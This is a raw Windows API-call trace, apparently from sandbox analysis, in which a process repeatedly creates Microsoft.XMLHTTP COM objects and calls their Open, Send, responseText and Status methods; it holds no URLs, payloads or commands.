	[0385.003] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0385.003] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0385.003] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c50) returned 0x0
	[0385.003] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c50) returned 0x3
	[0385.003] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0385.003] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0385.006] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0385.006] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0385.006] SysStringLen (param_1=0x0) returned 0x0
	[0385.006] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0385.006] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0385.006] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0385.006] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0385.006] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0385.006] ??2@YAPEAX_K@Z () returned 0x62f330
	[0385.006] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f330) 
	[0385.006] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0385.006] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0385.006] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0385.007] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0385.007] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0385.007] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0385.007] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0385.007] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0385.007] SysStringLen (param_1=0x0) returned 0x0
	[0385.007] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0385.007] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0385.007] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bc0) returned 0x0
	[0385.007] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0385.007] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0385.007] ??2@YAPEAX_K@Z () returned 0x62f310
	[0385.007] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0385.007] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0385.007] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0385.007] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bc0) returned 0x0
	[0385.008] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bc0) returned 0x3
	[0385.008] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0385.008] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bc0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0385.008] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0385.008] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0385.008] SysStringLen (param_1=0x0) returned 0x0
	[0385.008] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0385.008] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0385.008] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0385.008] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0385.008] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c28) returned 0x0
	[0385.008] ??2@YAPEAX_K@Z () returned 0x62f330
	[0385.008] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c28, pUnkSite=0x62f330) 
	[0385.008] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0385.008] XMLHTTPRequest:IUnknown:Release (This=0x49c5c28) returned 0x0
	[0385.008] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0385.008] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0385.009] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0385.009] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0385.009] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0385.009] longjmp () 
	[0385.009] longjmp () 
	[0385.009] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0385.009] SysStringLen (param_1=0x0) returned 0x0
	[0385.009] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0385.009] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0385.009] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0385.009] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0385.009] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0385.009] ??2@YAPEAX_K@Z () returned 0x62f310
	[0385.009] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0385.009] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0385.009] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0385.009] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0385.010] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0385.010] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0385.010] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0385.010] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0385.010] longjmp () 
	[0385.010] longjmp () 
	[0385.010] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0385.010] SysStringLen (param_1=0x0) returned 0x0
	[0385.010] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0385.010] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0385.010] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c77c0) returned 0x0
	[0385.010] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0385.010] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7828) returned 0x0
	[0385.010] ??2@YAPEAX_K@Z () returned 0x62f330
	[0385.010] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7828, pUnkSite=0x62f330) 
	[0385.010] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0385.011] XMLHTTPRequest:IUnknown:Release (This=0x49c7828) returned 0x0
	[0385.011] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c77c0) returned 0x0
	[0385.011] XMLHTTPRequest:IUnknown:AddRef (This=0x49c77c0) returned 0x3
	[0385.011] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0385.011] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0385.011] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0385.011] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0385.011] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0385.011] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0385.589] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0385.590] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0385.590] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0385.590] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0385.590] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0385.590] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
